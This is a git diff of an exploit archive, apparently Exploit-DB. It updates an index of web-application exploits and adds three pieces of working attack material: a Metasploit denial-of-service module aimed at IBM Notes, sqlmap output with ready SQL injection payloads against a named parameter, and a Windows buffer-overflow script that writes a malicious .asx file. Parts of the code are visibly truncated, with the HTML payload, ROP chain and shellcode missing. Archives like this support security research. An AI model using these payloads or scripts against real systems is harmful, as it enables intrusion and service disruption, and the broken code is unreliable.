Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 -38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - '/DSM/loader.php' 'Id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - '/DSM/loader.php Id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38986,platforms/php/webapps/38986.txt,"Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38987,platforms/php/webapps/38987.html,"Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38988,platforms/php/webapps/38988.txt,"Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38991,platforms/php/webapps/38991.pl,"Ovidentia NewsLetter Module 2.2 - 'admin.php' Remote File Inclusion",2015-12-16,bd0rk,php,webapps,80 39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - '/products.php' Multiple Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 -39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - '/news.php' 'id' Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 +39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - '/news.php id' Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 39016,platforms/php/webapps/39016.txt,"Joomla! Component Almond Classifieds - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 39028,platforms/php/webapps/39028.txt,"Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 -39029,platforms/php/webapps/39029.txt,"BloofoxCMS - '/bloofox/index.php' 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39030,platforms/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php' 'Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39029,platforms/php/webapps/39029.txt,"BloofoxCMS - '/bloofox/index.php Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39030,platforms/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39031,platforms/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80 @@ -37042,7 +37044,7 @@ id,file,description,date,author,platform,type,port 39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 39142,platforms/jsp/webapps/39142.txt,"Xangati - '/servlet/MGConfigData' Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 -39143,platforms/jsp/webapps/39143.txt,"Xangati - '/servlet/Installer' 'file' Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39143,platforms/jsp/webapps/39143.txt,"Xangati - '/servlet/Installer file' Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0 @@ -37057,8 +37059,8 @@ id,file,description,date,author,platform,type,port 39170,platforms/xml/webapps/39170.txt,"Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities",2016-01-05,"Sebastian Perez",xml,webapps,0 39171,platforms/php/webapps/39171.txt,"PHPIPAM 1.1.010 - Multiple Vulnerabilities",2016-01-05,"Mickael Dorigny",php,webapps,0 39172,platforms/php/webapps/39172.txt,"PrestaShop - getSimilarManufacturer.php id_manufacturer Parameter SQL Injection",2014-05-05,indoushka,php,webapps,0 -39173,platforms/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php' 'tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 -39174,platforms/php/webapps/39174.txt,"Caldera - '/costview2/printers.php' 'tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 +39173,platforms/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 +39174,platforms/php/webapps/39174.txt,"Caldera - '/costview2/printers.php tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39176,platforms/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 39178,platforms/php/webapps/39178.txt,"CMS Touch - pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 @@ -37146,10 +37148,10 @@ id,file,description,date,author,platform,type,port 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 39341,platforms/php/webapps/39341.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39342,platforms/php/webapps/39342.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39343,platforms/php/webapps/39343.txt,"OL-Commerce - '/OL-Commerce/affiliate_signup.php' 'a_country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39344,platforms/php/webapps/39344.txt,"OL-Commerce - '/OL-Commerce/affiliate_show_banner.php' 'affiliate_banner_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39345,platforms/php/webapps/39345.txt,"OL-Commerce - '/OL-Commerce/create_account.php' 'country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39346,platforms/php/webapps/39346.txt,"OL-Commerce - '/OL-Commerce/admin/create_account.php' 'entry_country_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39343,platforms/php/webapps/39343.txt,"OL-Commerce - '/OL-Commerce/affiliate_signup.php a_country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39344,platforms/php/webapps/39344.txt,"OL-Commerce - '/OL-Commerce/affiliate_show_banner.php affiliate_banner_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39345,platforms/php/webapps/39345.txt,"OL-Commerce - '/OL-Commerce/create_account.php country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39346,platforms/php/webapps/39346.txt,"OL-Commerce - '/OL-Commerce/admin/create_account.php entry_country_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39347,platforms/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39348,platforms/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39349,platforms/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -37233,7 +37235,7 @@ id,file,description,date,author,platform,type,port 39575,platforms/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39576,platforms/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80 39577,platforms/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80 -39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80 +39580,platforms/php/webapps/39580.txt,"Disc ORGanizer (DORG) - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80 39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80 39582,platforms/php/webapps/39582.txt,"Xoops 2.5.7.2 - Cross-Site Request Forgery (Arbitrary User Deletions)",2016-03-21,hyp3rlinx,php,webapps,80 39583,platforms/php/webapps/39583.txt,"Xoops 2.5.7.2 - Directory Traversal Bypass",2016-03-21,hyp3rlinx,php,webapps,80 @@ -38605,7 +38607,7 @@ id,file,description,date,author,platform,type,port 42738,platforms/asp/webapps/42738.py,"DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0 42739,platforms/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",hardware,webapps,0 42740,platforms/hardware/webapps/42740.txt,"iBall ADSL2+ Home Router - Authentication Bypass",2017-09-18,"Gem George",hardware,webapps,0 -42745,platforms/linux/webapps/42745.py,"Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0 +42745,platforms/linux/webapps/42745.py,"Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0 42751,platforms/php/webapps/42751.txt,"Foodspotting Clone 1.0 - SQL Injection",2017-09-13,8bitsec,php,webapps,0 42752,platforms/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection",2017-09-15,8bitsec,php,webapps,0 42754,platforms/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-19,"Simon Brannstrom",php,webapps,0 @@ -38663,3 +38665,5 @@ id,file,description,date,author,platform,type,port 42959,platforms/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps,0 42961,platforms/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",ruby,webapps,0 42966,platforms/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-10-09,intx0x80,jsp,webapps,0 +42967,platforms/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps,0 +42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0 diff --git a/platforms/multiple/dos/42969.rb b/platforms/multiple/dos/42969.rb new file mode 100755 index 000000000..a5b748f39 --- /dev/null +++ b/platforms/multiple/dos/42969.rb @@ -0,0 +1,63 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "IBM Notes encodeURI DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that +comes with IBM Lotus Notes. + If successful, it could cause the Notes client to hang and have +to be restarted. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', + ], + 'References' => [ + [ 'EXPLOIT-DB', '42602'], + [ 'CVE', '2017-1129' ], + [ 'URL', ' +http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ] + ], + 'DisclosureDate' => 'Aug 31 2017', + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + DOS + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end + diff --git a/platforms/php/webapps/2499.php b/platforms/php/webapps/2499.php index 4169f112d..65361e133 100755 --- a/platforms/php/webapps/2499.php +++ b/platforms/php/webapps/2499.php @@ -174,7 +174,7 @@ $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); -$temp=explode("index.php?op=profile&user=",$html); +$temp=explode("index.php?op=profile&user=",$html); for ($kk=1; $kk= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (SELECT) + Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)-- +--- +[00:47:57] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu +web application technology: Apache 2.4.7, PHP 5.5.9 +back-end DBMS: MySQL 5.0 +[00:47:57] [WARNING] HTTP error codes detected during run: +500 (Internal Server Error) - 444 times diff --git a/platforms/windows/local/42963.py b/platforms/windows/local/42963.py new file mode 100755 index 000000000..db12c8f82 --- /dev/null +++ b/platforms/windows/local/42963.py @@ -0,0 +1,83 @@ +import struct,sys +head =''' + + + +''' + +payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot + +fobj = open("exploit.asx","w") +fobj.write(payload) +fobj.close() \ No newline at end of file